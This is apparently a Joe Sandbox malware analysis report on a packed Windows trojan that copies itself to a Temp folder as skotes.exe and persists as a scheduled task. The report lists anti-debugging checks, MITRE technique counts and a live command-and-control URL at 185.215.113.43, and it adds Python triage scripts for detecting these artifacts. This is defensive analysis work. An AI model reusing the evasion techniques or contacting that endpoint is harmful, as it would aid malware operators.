                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053E058C Start: 053E078E End: 053E05EE0_2_053E058C
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Process queried: DebugPort (9 occurrences)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_053E0291 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Code function: 6_2_00D9652B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Code function: 6_2_00D9A302 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp  Binary or memory string: #&PProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Code function: 6_2_00D7D3E2 cpuid
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Code function: 6_2_00D7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime
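The signatures above are the classic user-mode anti-analysis set: enumerating window titles for Sysinternals tools, opening the SoftICE driver device names SICE, NTICE and SIWVID, querying the process DebugPort (the check behind CheckRemoteDebuggerPresent), rdtsc timing, reading the PEB through fs:[30h] and cpuid. The Python below is an added example, not code from the report or from Joe Sandbox: a static scan that looks for the same artifacts in a raw byte buffer, the kind of check a triage script runs before a sample ever executes. The buffer is constructed here to contain each artifact; the opcode encodings, the device names and the window-title strings are the assumptions, and 0F 31 / 0F A2 in data sections will produce false positives, so restrict the opcode scan to executable sections in real use.

```python
"""Added example (not part of the Joe Sandbox report): static scan for the
anti-analysis artifacts the behaviour signatures attribute to skotes.exe.
The byte buffer is constructed for illustration; it is not the sample."""
import re
from collections import Counter

# x86 (32-bit) encodings. mov eax, dword ptr fs:[30h] is 64 A1 30 00 00 00;
# mov r32, fs:[30h] for other registers is 64 8B /r with a disp32-only ModRM
# (mod=00, rm=101 -> 05/0D/15/1D/25/2D/35/3D). fs:[30h] is the PEB pointer.
OPCODE_PATTERNS = {
    "peb_read_fs30": re.compile(
        rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"),
    "rdtsc": re.compile(rb"\x0F\x31"),   # timing-based debugger/VM detection
    "cpuid": re.compile(rb"\x0F\xA2"),   # hypervisor bit / vendor string checks
}

# Strings from the signatures above: SoftICE device names, the Sysinternals
# window title substring, and the Program Manager window name. Counted both
# as ASCII and as UTF-16LE because Windows binaries carry either.
ANALYSIS_STRINGS = ["SICE", "NTICE", "SIWVID", "sysinternals", "Program Manager"]


def scan(buf: bytes) -> Counter:
    """Count every opcode pattern and every analysis string in buf."""
    hits = Counter()
    for name, pattern in OPCODE_PATTERNS.items():
        hits[name] += len(pattern.findall(buf))
    for s in ANALYSIS_STRINGS:
        for encoded in (s.encode("ascii"), s.encode("utf-16-le")):
            hits[f"str:{s}"] += buf.count(encoded)
    return hits


def verdict(hits: Counter) -> str:
    """rdtsc/cpuid alone occur in benign code; require two classes of evidence."""
    opcode_hits = sum(hits[k] for k in OPCODE_PATTERNS)
    string_hits = sum(v for k, v in hits.items() if k.startswith("str:"))
    if opcode_hits and string_hits:
        return "anti-analysis: opcodes and strings"
    if opcode_hits or string_hits:
        return "anti-analysis: weak (single class of evidence)"
    return "none"


# Constructed buffer: PEB.BeingDebugged read, rdtsc, cpuid, a second PEB read,
# the three SoftICE device paths and a UTF-16 "Program Manager".
SAMPLE = (
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, fs:[30h]      -> PEB
    b"\x8A\x40\x02"                    # mov al, [eax+2]        -> PEB.BeingDebugged
    b"\x0F\x31"                        # rdtsc
    b"\x0F\xA2"                        # cpuid
    b"\x64\x8B\x1D\x30\x00\x00\x00"    # mov ebx, fs:[30h]
    b"\\\\.\\SICE\x00\\\\.\\NTICE\x00\\\\.\\SIWVID\x00"
    + "Program Manager".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    result = scan(SAMPLE)
    for key in sorted(result):
        print(f"{key:24s} {result[key]}")
    print(verdict(result))
```

The two `mov ..., fs:[30h]` hits correspond to the two code functions the report lists (6_2_00D9652B and 6_2_00D9A302); a Themida-protected sample like this one hides most of its own checks inside the VM, so expect the real binary to show far fewer raw-opcode hits than runtime signatures.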

                    Stealing of Sensitive Information

Yara match, file source: 0.2.file.exe.b40000.0.unpack (type: UNPACKEDPE)
Yara match, file source: 3.2.skotes.exe.d60000.0.unpack (type: UNPACKEDPE)
Yara match, file source: 6.2.skotes.exe.d60000.0.unpack (type: UNPACKEDPE)
Yara match, file source: 2.2.skotes.exe.d60000.0.unpack (type: UNPACKEDPE)
Yara match, file source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp (type: MEMORY)
Yara match, file source: 00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmp (type: MEMORY)
Yara match, file source: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp (type: MEMORY)
Yara match, file source: 00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmp (type: MEMORY)
Yara match, file source: 00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmp (type: MEMORY)
Yara match, file source: 00000006.00000003.2797199366.00000000051D0000.00000004.00001000.00020000.00000000.sdmp (type: MEMORY)
Yara match, file source: 00000000.00000002.2193715965.0000000000B41000.00000040.00000001.01000000.00000003.sdmp (type: MEMORY)
Yara match, file source: 00000000.00000003.2153521892.0000000005210000.00000004.00001000.00020000.00000000.sdmp (type: MEMORY)
MITRE ATT&CK matrix (tactic: technique (number of matching signatures); only techniques with a signature count are listed, the remaining cells of the matrix are unpopulated placeholders)
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1)
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Discovery: System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matching signatures

Antivirus results, submitted file (Source | Detection | Scanner | Label)
file.exe | 55% | ReversingLabs | Win32.Packed.Themida
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
Antivirus results, dropped file (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 55% | ReversingLabs | Win32.Packed.Themida
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 54% | Virustotal |
No Antivirus matches
No Antivirus matches
Antivirus results, URLs (Source | Detection | Scanner | Label)
http://185.215.113.43/Zu7JuNko/index.php15.113.43a | 100% | Avira URL Cloud | malware
                    No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.43/Zu7JuNko/index.php | false | | high
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
http://185.215.113.43/Zu7JuNko/index.php4 | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php: | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php8 | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php; | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpded | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php& | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpD | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php15.113.43a | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpH | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.php- | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpn | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpL | skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.43/Zu7JuNko/index.phpl | skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | false | | high
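The fourteen memory strings above are one endpoint carved from process memory with different trailing bytes: string extraction runs until a NUL, so whatever heap data followed the URL is glued onto it, which is also why the Avira hit is on the variant with the garbage tail. The Python below is an added example, not Joe Sandbox code: it groups carved strings by scheme and host and takes the longest common prefix inside each group, which recovers the URL that was actually in memory and yields a clean indicator for a block rule. The input list is constructed from six of the rows above; the assumption is that at least two carves of the same URL diverge right after its true end (a single carve cannot be trimmed this way, and two genuinely different paths on one host would be merged, so cluster on the first path component first when a C2 uses several endpoints).

```python
"""Added example (not part of the Joe Sandbox report): collapse URL strings
carved from process memory into the endpoint they share."""
import os
from urllib.parse import urlsplit

# Constructed from the report's memory-string table (six of the fourteen rows).
CARVED = [
    "http://185.215.113.43/Zu7JuNko/index.php4",
    "http://185.215.113.43/Zu7JuNko/index.php:",
    "http://185.215.113.43/Zu7JuNko/index.php8",
    "http://185.215.113.43/Zu7JuNko/index.phpded",
    "http://185.215.113.43/Zu7JuNko/index.php15.113.43a",
    "http://185.215.113.43/Zu7JuNko/index.phpncoded",
]


def collapse_carved_urls(candidates):
    """Map (scheme, host) -> the longest prefix shared by every carve of it.

    Strings that do not parse as scheme://host/... are skipped; a host seen
    only once is returned unchanged because nothing tells us where its tail
    starts."""
    groups = {}
    for text in candidates:
        parts = urlsplit(text)
        if not parts.scheme or not parts.netloc:
            continue  # "Program Manager" and friends are not URLs
        groups.setdefault((parts.scheme, parts.netloc), []).append(text)
    collapsed = {}
    for key, urls in groups.items():
        collapsed[key] = os.path.commonprefix(urls) if len(urls) > 1 else urls[0]
    return collapsed


def network_indicators(collapsed):
    """Sorted host list and sorted canonical URL list for a blocklist."""
    hosts = sorted({netloc for (_, netloc) in collapsed})
    urls = sorted(collapsed.values())
    return hosts, urls


if __name__ == "__main__":
    canon = collapse_carved_urls(CARVED)
    for (scheme, host), url in canon.items():
        print(f"{scheme}://{host} -> {url}")
    print(network_indicators(canon))
```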
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.215.113.43 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561633
Start date and time: 2024-11-24 02:21:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 1548 because it is empty
• Execution Graph export aborted for target skotes.exe, PID 3064 because there are no executed functions
• Execution Graph export aborted for target skotes.exe, PID 4864 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Timeline (Time | Type | Description)
02:21:58 | Task Scheduler | Run new task: skotes, path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
20:23:02 | API Interceptor | 1034x Sleep call for process: skotes.exe modified
Context for IP 185.215.113.43 (Associated Sample Name / URL | Detection | Threat Name | Context)
file.exe | malicious | Amadey | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
2fQ8fpTWAP.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
No context
Context for ASN WHOLESALECONNECTIONSNL (Associated Sample Name / URL | Detection | Threat Name | Context)
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey | 185.215.113.43
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
2fQ8fpTWAP.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
No context
No context
Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1884672
Entropy (8bit): 7.9510844124633255
Encrypted: false
SSDEEP: 49152:rD4pAVIEUn78EYltySaV85C1E/K4fvnMPgn/E:r8+VOn4EY6gfK4cP/
MD5: 6D76634E0D5A3748DBB40ED91D91480A
SHA1: 70FA798C82153DB02E218B3A7EFA2F56F051CCED
SHA-256: D99688821D8644F9E44764BE9944C327ABC3162866E51AD78A02DCDC25A08730
SHA-512: 137B80797C2158247ADB3A7A865B5D0A44CF096B0A6C9377F2E548B5475D811273F0A367AA11DB74538474DF64FE58384F04CE013D9D5395904E68A8EDF9AF9A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 55%
• Antivirus: Virustotal, Detection: 54%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@..........................@K...........@.................................W...k.......D.....................J.............................L.J..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...iaxkupqh.....P1.....................@...fnhucfqp......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 302
Entropy (8bit): 3.4396029193056945
Encrypted: false
SSDEEP: 6:qgdbXUhXUEZ+lX1CGdKUe6tE9+AQy0lBz1ut0:D4Q1CGAFD9+nVBAt0
MD5: 7C2BF1C453495148EC9D586399D2C7B7
SHA1: EDC88EFB8C0756B6087693A5DE6A6EF039F5F5D8
SHA-256: D0A7D66022488CD694DF71B3689B0BD69F2D454897E217C6A3A5D4CC85B0A325
SHA-512: 31750B595E795B90759CEA39E5B72C65FE30EEA73CB0D5CE8B85F86F4349EFAFADE78AF7E21DBA390884BC140C38187BED061518FCD47C2C1923E0A09759164E
Malicious: false
Reputation: low
Preview: .......6...O.p.P]..BF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
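Three things in the dropped-file records above are worth checking mechanically rather than by eye: the first file's MD5/SHA1/SHA256 are identical to file.exe's, so skotes.exe is a byte-for-byte self-copy of the sample into %LOCALAPPDATA%\Temp\abc3bc1985 (its entropy of 7.95 bits per byte is the Themida packing, not a new payload); the 26-byte text is the content of a Zone.Identifier alternate data stream with ZoneId=0, the Local Machine zone, so the copy carries no mark-of-the-web; and the 302-byte "data" file holds UTF-16LE strings, a path to skotes.exe and a MACHINE\user name, which is what the job file behind the "skotes" scheduled task in the timeline would look like (an inference from the preview, not something the report states). The Python below is an added example, not part of the report: each helper performs one of those checks on constructed input. The sample bytes, the 7.5 entropy threshold and the six-character string minimum are assumptions; the zone names are the standard URLZONE values.

```python
"""Added example (not part of the Joe Sandbox report): triage helpers for the
dropped-file records: packed self-copy check, Zone.Identifier parsing, and
UTF-16LE string carving. Sample inputs are constructed inline."""
import hashlib
import math
import re
from collections import Counter

PACKED_ENTROPY_THRESHOLD = 7.5  # assumption: usual cut-off for packed/encrypted payloads


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0, 8]; the report's 7.95 for file.exe is near the ceiling."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data: bytes) -> bool:
    return shannon_entropy(data) >= PACKED_ENTROPY_THRESHOLD


def is_self_copy(original: bytes, dropped: bytes) -> bool:
    """True when the 'dropped' file is byte-identical to the submitted sample."""
    return hashlib.sha256(original).digest() == hashlib.sha256(dropped).digest()


# Standard URLZONE values as written into a Zone.Identifier alternate data stream.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def parse_zone_identifier(text: str):
    """Return (ZoneId, name) from a [ZoneTransfer] block, or None if absent.
    Browser downloads get ZoneId=3; ZoneId=0 means no SmartScreen/MOTW prompt."""
    in_block, zone = False, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower() == "[zonetransfer]":
            in_block = True
        elif in_block and line.startswith("ZoneId="):
            zone = int(line.split("=", 1)[1])
    if zone is None:
        return None
    return zone, ZONE_NAMES.get(zone, "unknown")


# Printable ASCII encoded as UTF-16LE, at least six characters long (assumption).
_UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def utf16_strings(buf: bytes):
    """Carve printable UTF-16LE runs (paths, account names) from binary data."""
    return [m.group().decode("utf-16-le") for m in _UTF16_RUN.finditer(buf)]


# Constructed inputs, not the real files: a zero-filled 'PE', a maximally
# uniform byte stream, the ZoneTransfer text from the report, and a job-like
# blob carrying two UTF-16 strings that mirror the report's preview.
PLAIN = b"MZ" + b"\x00" * 4094
HIGH_ENTROPY = bytes(range(256)) * 16
ZONE_TEXT = "[ZoneTransfer]\r\nZoneId=0\r\n"
JOB_LIKE = (
    b"\x00" * 8
    + "C:\\Users\\engineer\\AppData\\Local\\Temp\\abc3bc1985\\skotes.exe".encode("utf-16-le")
    + b"\x00\x00"
    + "ENGINEER-PC\\engineer".encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    print("plain   ", round(shannon_entropy(PLAIN), 3), looks_packed(PLAIN))
    print("uniform ", round(shannon_entropy(HIGH_ENTROPY), 3), looks_packed(HIGH_ENTROPY))
    print("self-copy", is_self_copy(HIGH_ENTROPY, HIGH_ENTROPY))
    print("zone    ", parse_zone_identifier(ZONE_TEXT))
    print("strings ", utf16_strings(JOB_LIKE))
```

In an investigation the same three checks run against the real artifacts: hash the file under %LOCALAPPDATA%\Temp\abc3bc1985 against the original download, read its Zone.Identifier stream, and carve the job file for the account that registered the task.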
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9510844124633255
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'884'672 bytes
MD5: 6d76634e0d5a3748dbb40ed91d91480a
SHA1: 70fa798c82153db02e218b3a7efa2f56f051cced
SHA256: d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730
SHA512: 137b80797c2158247adb3a7a865b5d0a44cf096b0a6c9377f2e548b5475d811273f0a367aa11db74538474df64fe58384f04ce013d9d5395904e68a8edf9af9a
SSDEEP: 49152:rD4pAVIEUn78EYltySaV85C1E/K4fvnMPgn/E:r8+VOn4EY6gfK4cP/
TLSH: BE95332ED71C7F24C4C408734BA367C2F668ED1745D8C7FE658806EABC6624ACBA15B4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8b1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks: none listed
CLR (.Net) Version: none
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, 0x8b1000 in section .taggant)
jmp 00007FD288E1027Ah
push fs
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FD288E12275h
add byte ptr [eax+eax], bl
add byte ptr [eax], al   (7 times)
add cl, byte ptr [edx]
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al   (repeated for the rest of the listing: the disassembler is decoding zero-filled bytes, since 00 00 encodes add byte ptr [eax], al)
                                                add dword ptr [eax+00000000h], eax
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                and byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x344 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4af49c | 0x10 | iaxkupqh
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x4af44c | 0x18 | iaxkupqh
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                (unnamed) | 0x1000 | 0x68000 | 0x2de00 | ac47e1b1a871500367af13e27838d724 | False | 0.9983289339237057 | data | 7.989396011362113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x69000 | 0x344 | 0x400 | 982623c07c43a8169da5c3bd55ce4d06 | False | 0.4345703125 | data | 5.395849414192414 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
